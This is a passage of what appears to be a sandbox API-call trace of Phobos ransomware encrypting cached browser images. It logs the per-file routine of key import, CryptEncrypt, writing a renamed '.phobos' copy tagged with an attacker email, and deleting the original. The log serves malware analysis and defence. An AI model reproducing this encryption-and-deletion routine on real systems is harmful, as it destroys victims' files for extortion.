phKey=0x2f4fc84*=0xa32d28) returned 1 [0177.335] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.335] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1aa, lpOverlapped=0x0) returned 1 [0177.362] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1b0, dwBufLen=0x1b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1b0) returned 1 [0177.362] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1b0, lpOverlapped=0x0) returned 1 [0177.363] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0177.363] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.363] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0177.363] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.363] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0177.363] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.363] CloseHandle (hObject=0x14c) returned 1 [0177.363] CloseHandle (hObject=0x178) returned 1 [0177.364] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BB8jcOr[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bb8jcor[2].png")) returned 1 [0177.365] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0177.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbcfjo[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.365] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10951) returned 1 [0177.365] CloseHandle (hObject=0x178) returned 1 [0177.365] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbcfjo[1].jpg")) returned 0x2020 [0177.365] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbcfjo[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbcfjo[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.365] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.365] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbcfjo[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.366] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0177.366] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.366] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2ac7, lpOverlapped=0x0) returned 1 [0177.381] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2ad0, dwBufLen=0x2ad0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2ad0) returned 1 [0177.381] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2ad0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2ad0, lpOverlapped=0x0) returned 1 [0177.382] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0177.382] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.382] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0177.382] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.382] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0177.382] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.382] CloseHandle (hObject=0x178) returned 1 [0177.382] CloseHandle (hObject=0x14c) returned 1 [0177.382] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBCFjo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbcfjo[1].jpg")) returned 1 [0177.391] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0177.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbimkx[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.392] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1809) returned 1 [0177.392] CloseHandle (hObject=0x14c) returned 1 [0177.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbimkx[1].jpg")) returned 0x2020 [0177.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbimkx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbimkx[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.392] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.392] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbimkx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0177.393] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.393] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x711, lpOverlapped=0x0) returned 1 [0177.402] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x720, dwBufLen=0x720 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x720) returned 1 [0177.402] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x720, lpOverlapped=0x0) returned 1 [0177.403] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0177.403] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.403] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0177.403] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.403] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0177.403] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.403] CloseHandle (hObject=0x14c) returned 1 [0177.403] CloseHandle (hObject=0x178) returned 1 [0177.403] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBImKX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbimkx[1].jpg")) returned 1 [0177.404] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0177.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbblhtz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.405] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=12498) returned 1 [0177.405] CloseHandle (hObject=0x178) returned 1 [0177.405] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbblhtz[1].jpg")) returned 0x2020 [0177.405] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbblhtz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbblhtz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.405] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.405] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbblhtz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.405] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0177.405] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.405] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x30d2, lpOverlapped=0x0) returned 1 [0177.415] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30e0, dwBufLen=0x30e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30e0) returned 1 [0177.415] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x30e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x30e0, lpOverlapped=0x0) returned 1 [0177.417] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0177.417] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.417] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0177.417] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.417] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0177.417] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.417] CloseHandle (hObject=0x178) returned 1 [0177.417] CloseHandle (hObject=0x14c) returned 1 [0177.417] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBLhTZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbblhtz[1].jpg")) returned 1 [0177.419] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0177.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbnhzy[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.419] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2489) returned 1 [0177.419] CloseHandle (hObject=0x14c) returned 1 [0177.419] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbnhzy[1].jpg")) returned 0x2020 [0177.419] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbnhzy[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbnhzy[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0177.419] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.419] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0177.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbnhzy[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.420] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0177.420] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.420] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9b9, lpOverlapped=0x0) returned 1 [0177.430] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9c0, dwBufLen=0x9c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9c0) returned 1 [0177.430] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9c0, lpOverlapped=0x0) returned 1 [0177.430] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0177.430] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0177.431] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0177.431] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.431] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0177.431] CryptDestroyKey (hKey=0xa32d28) returned 1 [0177.431] CloseHandle (hObject=0x14c) returned 1 [0177.431] CloseHandle (hObject=0x178) returned 1 [0177.431] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBnhZY[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbnhzy[1].jpg")) returned 1 [0177.432] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0177.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPiby[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpiby[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0177.432] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7201) returned 1 [0177.432] CloseHandle (hObject=0x178) returned 1 [0177.432] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 